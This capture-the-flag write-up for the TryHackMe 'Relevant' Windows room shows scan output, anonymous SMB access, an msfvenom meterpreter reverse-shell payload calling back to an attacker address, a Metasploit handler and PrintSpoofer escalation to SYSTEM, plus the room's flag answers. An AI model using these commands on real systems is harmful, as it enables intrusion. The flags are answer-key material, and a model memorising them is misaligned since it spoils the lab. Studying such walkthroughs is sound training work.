In this post, we covered a black box penetration testing challenge where we performed initial port scanning, found network shares from which we extracted sensitive data and uploaded a reverse shell generated by Msfvenom. After gaining access, we found that the machine configuration allows for the exploitation of printspoofer which led to root access. This was part of TryHackMe Relevant.
Task Description
You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days.
Scope of Work
The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:
- User.txt
- Root.txt
Additionally, the client has provided the following scope allowances:
- Any tools or techniques are permitted in this engagement, however we ask that you attempt manual exploitation first
- Locate and note all vulnerabilities found
- Submit the flags discovered to the dashboard
- Only the IP address assigned to your machine is in scope
- Find and report ALL vulnerabilities (yes, there is more than one path to root)
(Roleplay off)I encourage you to approach this challenge as an actual penetration test. Consider writing a report, to include an executive summary, vulnerability and exploitation assessment, and remediation suggestions, as this will benefit you in preparation for the eLearnSecurity Certified Professional Penetration Tester or career as a penetration tester in the field.
Note – Nothing in this room requires Metasploit
Penetration Testing Methodology
- Reconnaissance
- Enumeration
- Exploiting
- Privilege Escalation
Port Scanning Results
An Nmap scan is conducted in two parts: first to detect open ports and then to enumerate services and versions. Key services found include:
- HTTP servers on ports 80 and 4963 (both running IIS),
- SMB server for network sharing,
- Remote Desktop Protocol (RDP).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: RELEVANT
| NetBIOS_Domain_Name: RELEVANT
| NetBIOS_Computer_Name: RELEVANT
| DNS_Domain_Name: Relevant
| DNS_Computer_Name: Relevant
| Product_Version: 10.0.14393
|_ System_Time: 2020-10-03T23:01:57+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2020-07-24T23:16:08
|_Not valid after: 2021-01-23T23:16:08
|_ssl-date: 2020-10-03T23:02:37+00:00; 0s from scanner time.
49663/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-10-03T16:02:00-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-10-03T23:02:01
|_ start_date: 2020-10-03T22:54:55
Listing Network Shares & Extracting Data
The video shows accessing the SMB shares without credentials. A share named nt4 network service is discovered and accessed anonymously, leading to a file named passwords.txt.Passwords File: The file contains Base64-encoded credentials, which, after decoding, reveal usernames (bill, bob) and passwords.
RDP Login Attempts: With the decoded usernames and passwords, attempts are made to log in via RDP and SMB using PsExec. However, access attempts fail, indicating either incorrect credentials or restricted permissions.
The investigation shifts back to the web servers on ports 80 and 4963. After examining both, the focus is directed toward port 4963 for further exploitation. This approach suggests using a directory brute-forcing tool to identify possible entry points for exploiting the web server.
An upload test confirms write access to the SMB share. This opens the possibility of uploading a reverse shell file that could later be executed to gain remote access.
$ smbclient -L //10.10.11.52
Enter WORKGROUP\kali's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
SMB1 disabled -- no workgroup available
$ smbclient //10.10.11.52/nt4wrksv
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 25 23:46:04 2020
.. D 0 Sat Jul 25 23:46:04 2020
passwords.txt A 98 Sat Jul 25 17:15:33 2020
7735807 blocks of size 4096. 4951539 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
Uploading Reverse Shell to Network Shares
$ msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.8.22.11 lport=4444 -f aspx -o shell.aspx
smb: \> put shell.aspx
putting file shell.aspx as \shell.aspx (12.9 kb/s) (average 7.9 kb/s)
smb: \> ls
. D 0 Thu Aug 27 22:48:34 2020
.. D 0 Thu Aug 27 22:48:34 2020
passwords.txt A 98 Sat Jul 25 17:15:33 2020
shell.aspx A 38409 Thu Aug 27 22:48:37 2020
test.txt A 5 Thu Aug 27 22:42:10 2020
7735807 blocks of size 4096. 4946700 blocks available
smb: \>
kali@kali:/data/vpn$ msfconsole -q
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.8.22.11
lhost => 10.8.22.11
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.8.22.11:4444
Linux Privilege Escalation
Checking the privileges with getpriv in the Meterpreter session reveals that we are granted with SeImpersonatePrivilege.
meterpreter > getprivs Enabled Process Privileges ========================== Name ---- SeAssignPrimaryTokenPrivilege SeAuditPrivilege SeChangeNotifyPrivilege SeCreateGlobalPrivilege SeImpersonatePrivilege SeIncreaseQuotaPrivilege SeIncreaseWorkingSetPrivilege
Exploiting PrintSpoofer Vulnerability
PrintSpoofer is an exploit that can be used to escalate service user permissions on Windows Server 2016, Server 2019, and Windows 10.
To escalate privileges, the service account must have SeImpersonate privileges. To execute:
PrintSpoofer.exe -i -c cmd
With appropriate privileges this should grant system user shell access. Download the exploit from this link.
c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer.exe -i -c powershell.exe PrintSpoofer.exe -i -c powershell.exe [+] Found privilege: SeImpersonatePrivilege [+] Named pipe listening... [+] CreateProcessAsUser() OK Windows PowerShell Copyright (C) 2016 Microsoft Corporation. All rights reserved. PS C:\Windows\system32> whoami whoami nt authority\system
Room Answers | TryHackMe Relevant
User Flag
THM{fdk4ka34vk346ksxfr21tg789ktf45}
Root Flag
THM{1fk5kf469devly1gl320zafgl345pv}
Video Walkthrough | TryHackMe Relevant Walkthrough
